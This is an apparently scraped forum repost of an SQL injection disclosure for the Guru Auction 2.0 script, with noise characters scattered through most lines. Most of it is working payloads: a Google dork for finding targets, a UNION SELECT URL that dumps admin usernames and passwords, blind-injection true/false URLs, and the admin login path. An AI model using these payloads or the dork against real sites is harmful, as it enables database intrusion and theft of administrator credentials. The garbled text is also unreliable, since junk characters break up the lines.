Guru Auction 2.0 Multiple SQL Injection Vulnerabilities) i: H) `& n' \8 ]
% F7 ~/ E# m' ]$ M作者 : v3n0m' K4 C' K, A: s# d7 A
应用 : Guru Auction 2.0
2 \7 K4 ?0 l4 R$ v% P: p2 i, W5 E0 cPrice : $491 O+ N+ _, B' m. |3 @2 w# U& ?
Vendor : http://www.guruscript.com/
4 Q1 |* ~1 S. K6 qGoogle Dork : inurl:subcat.php?cate_id=
# F9 ?7 S' C- O+ Q, t
, v6 y2 U8 O+ r2 mSQLi p0c:
! y f# r5 V. \+ z( d- W; v! ?" {. W~~~~~~~~~~
3 p: k3 q- b, X, zhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
$ a0 X [4 ? ~ W: h. G# I8 j& a+ R
; i8 o D' f ?5 X. A9 N盲注 p0c:
+ g. p: ]! {: Q6 O9 }, L~~~~~~~~~~' g }' j5 X7 r |2 y
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
3 p- E' U% n& Uhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
, r4 N% E D) Y" H$ O * \( s( M/ N; M9 j, W
管理登录入口:3 }6 @# M K1 Q u/ a
~~~~~~~~~~) M. f& t7 P; Q# I' p( u0 A9 q
http://domain.tld/[path]/admin/
; ?" {2 t* ~* k) c |
发表于 2012-12-31 09:24:05
收藏
支持
反对